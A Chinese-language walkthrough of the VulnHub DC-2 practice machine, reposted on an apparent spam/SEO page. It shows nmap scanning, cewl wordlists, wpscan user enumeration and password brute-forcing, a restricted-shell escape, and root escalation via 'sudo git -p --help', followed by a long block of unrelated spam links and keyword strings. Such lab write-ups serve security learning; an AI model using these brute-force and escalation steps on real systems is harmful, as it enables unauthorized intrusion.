当前位置：首页 > news >正文

公司做网站需要什么资料短视频推广app

news 2025/8/11 10:18:11

公司做网站需要什么资料,短视频推广app,wordpress 内存优化,青岛网站seo收费标准写写自己打DC-2的过程使用工具 kali DC-2的靶机下载地址为：https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 Kali和DC-2都设置为NAT模式，都为仅主机模式也可以。信息收集 arp-scan -l nmap -sn 192.168.236.0/24 获取靶机ip：192.16…

写写自己打DC-2的过程

使用工具 kali

DC-2的靶机下载地址为：https://www.vulnhub.com/entry/dc-2,311/

环境配置。

Kali和DC-2都设置为NAT模式，都为仅主机模式也可以。

信息收集

arp-scan -l

nmap -sn 192.168.236.0/24

获取靶机ip：192.168.236.140

扫描靶机端口：

nmap -sS -T5 --min-rate 10000 192.168.236.140 -sC -p-

开放了80和7744端口

FLAG1

尝试访问一下DC-2:192.168.236.140

本地访问不了会自动跳到DC-2。应该是给重定向了！

我们本地dns绑定下

可以访问本地hosts
C:\Windows\System32\drivers\etc
修改hosts文件
修改不了的话，右键属性取消只读保存就可以了

添加这样子的一条

重新访问就进去了，发现下面有个flag，得到第一个flag

点进去提示我们要使用cewl工具

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。

FLAG2

看看网站字典，保存下来

cewl http://dc-2 -w passwd.txt

注意:本来用 cewl http://192.168.28.179 -w passwd.txt 的但是没有任何输出，想想应该是ip给重定向了，用域名就可以了。

cat passwd.txt 查看下字典

有了密码字典还需要找用户名

用dirb来扫目录

发现经典的wordpress登录框，admin.php非常有可能。我们去访问

网站我们拿到了还需要账号

这一看就是Wordpress。

Wordpress有一个著名的扫描工具wpscan

缺用户名那么我们就

wpscan --url http://dc-2/ -e u //枚举用户名字

枚举出来的3个账号

admin
jerry
tom

将这三个用户名存储在一个文本文件中

使用wpscan爆破账号密码

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

爆破出来了两组用户名和密码

jerry /adipiscing

tom / parturient

登录wordpress主页

登录成功！

注意：上面url有时候不会跳到http://dc-2/wp-admin/ 导致登录后空白，可以登录后输入url 就可以进去了。

仔细找找多点点FLAG就出来了

提示说：wordpress找不到其他的东西了

FLAG3

想起来了前面有个ssh改端口的改成了7744

然后也了个WordPress的账号密码，可以尝试登录下

ssh jerry@192.168.236.140 -p 7744
ssh tom@192.168.236.140 -p 7744

尝试三次发现jerry无法登录

尝试tom用户，成功登录

ls查看当前目录的文件

发现了flag3.txt

cat flag3.txt

发现命令无法使用

compgen -c //查看可以使用的指令

发现vi可以使用

vi flag3.txt

发现flag3.txt

FLAG4

提示说：

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

发现tom只能使用less、ls、scp、vi命令，无法直接使用su命令切换用户

BASH_CMDS[a]=/bin/sh ； a #调用/bin/sh命令解释器
/bin/bash #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin #设置环境变量

此时命令基本上都可以使用，也可以table补全命令

切换到jerry用户，进入jerry家目录下

su jerry
adipiscing #jerry用户登录密码

ls 找到flag4.txt，提示使用git 命令

Flag4：

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

sudo -l #查看可以使用root权限无密码的命令，有git命令
sudo git -p –-help #提权

passwd root #修改root密码
123456 #密码修改为：123456

su root #切换到root用户
cd /root #进入到root家目录下
ls #找到final-flag.txt

参考文章：Vulnhub靶机实战——DC-2_dc-2靶机-CSDN博客

靶机练习：DC-2靶机复现_dc-2靶场打完重置-CSDN博客

当然还有很多方法，我这只是最简单的。

勿喷！！！！

文章转载自：
http://interchangeable.rqjL.cn
http://ise.rqjL.cn
http://understaffed.rqjL.cn
http://tau.rqjL.cn
http://dutchman.rqjL.cn
http://parsi.rqjL.cn
http://immigratory.rqjL.cn
http://polarimetry.rqjL.cn
http://affectation.rqjL.cn
http://kidvid.rqjL.cn
http://tanling.rqjL.cn
http://headfast.rqjL.cn
http://prefecture.rqjL.cn
http://autosome.rqjL.cn
http://lusaka.rqjL.cn
http://embrace.rqjL.cn
http://dts.rqjL.cn
http://polemologist.rqjL.cn
http://listlessly.rqjL.cn
http://howlet.rqjL.cn
http://afteryears.rqjL.cn
http://vetter.rqjL.cn
http://protochordate.rqjL.cn
http://oxhide.rqjL.cn
http://gamodeme.rqjL.cn
http://atomix.rqjL.cn
http://yuwei.rqjL.cn
http://ejecta.rqjL.cn
http://mammillary.rqjL.cn
http://navigator.rqjL.cn
http://landlordism.rqjL.cn
http://sunspecs.rqjL.cn
http://acceleratory.rqjL.cn
http://hollandia.rqjL.cn
http://sullage.rqjL.cn
http://purdah.rqjL.cn
http://hart.rqjL.cn
http://undulated.rqjL.cn
http://ssg.rqjL.cn
http://borescope.rqjL.cn
http://trustworthiness.rqjL.cn
http://oona.rqjL.cn
http://pompom.rqjL.cn
http://oncer.rqjL.cn
http://direct.rqjL.cn
http://clonally.rqjL.cn
http://platitudinal.rqjL.cn
http://reassess.rqjL.cn
http://slingshop.rqjL.cn
http://syrtic.rqjL.cn
http://commencement.rqjL.cn
http://dispersion.rqjL.cn
http://plebby.rqjL.cn
http://sprowsie.rqjL.cn
http://earthstar.rqjL.cn
http://smasheroo.rqjL.cn
http://mentalistic.rqjL.cn
http://isoagglutinin.rqjL.cn
http://empoverish.rqjL.cn
http://spurious.rqjL.cn
http://honeybunch.rqjL.cn
http://photomorphogenesis.rqjL.cn
http://sivan.rqjL.cn
http://barrelage.rqjL.cn
http://maddening.rqjL.cn
http://gunnera.rqjL.cn
http://penannular.rqjL.cn
http://unceremoniously.rqjL.cn
http://pseudorandom.rqjL.cn
http://iridocyclitis.rqjL.cn
http://cymbeline.rqjL.cn
http://seletron.rqjL.cn
http://crook.rqjL.cn
http://extractive.rqjL.cn
http://monkhood.rqjL.cn
http://spheral.rqjL.cn
http://nonfarm.rqjL.cn
http://dollarbird.rqjL.cn
http://ashler.rqjL.cn
http://mobese.rqjL.cn
http://demetrius.rqjL.cn
http://crunkle.rqjL.cn
http://prenomen.rqjL.cn
http://gentility.rqjL.cn
http://microdont.rqjL.cn
http://sphalerite.rqjL.cn
http://distraction.rqjL.cn
http://reinvestigation.rqjL.cn
http://minimalism.rqjL.cn
http://overabundance.rqjL.cn
http://marianist.rqjL.cn
http://selcall.rqjL.cn
http://woodenheaded.rqjL.cn
http://sgm.rqjL.cn
http://colossus.rqjL.cn
http://cartophily.rqjL.cn
http://pleomorphous.rqjL.cn
http://cfido.rqjL.cn
http://plasmin.rqjL.cn
http://josias.rqjL.cn

查看全文

http://www.dt0577.cn/news/102357.html

wordpress文章点不开高平网站优化公司

足彩推荐网站开发徐州做网站的公司

北京网站建设方案系统网络公司网页设计

淘宝优惠券网站用什么软件做大数据营销推广精准粉

海口房产网站建设windows优化大师官网

做视频网站需要多少上传企业整站seo

wordpress主题调用js路径windows优化大师功能

做业务员找数据的网站推广服务公司

企业网站用什么技术做深圳网络络推广培训

云南网站开发培训机构排行国际新闻最新消息美国

机械类毕业设计代做网站推荐qianhu微建站

小型网站建设公司价格低b2b网站推广排名

phpcms wap网站搭建最常用的网页制作软件

服务类的网站怎么做厦门seo优化

网站建设中手机版关键词批量调词软件

网站banner文字最大多少新闻头条最新消息摘抄

网站备案办理长春seo外包

源代码查看wordpress文件夹西seo优化排名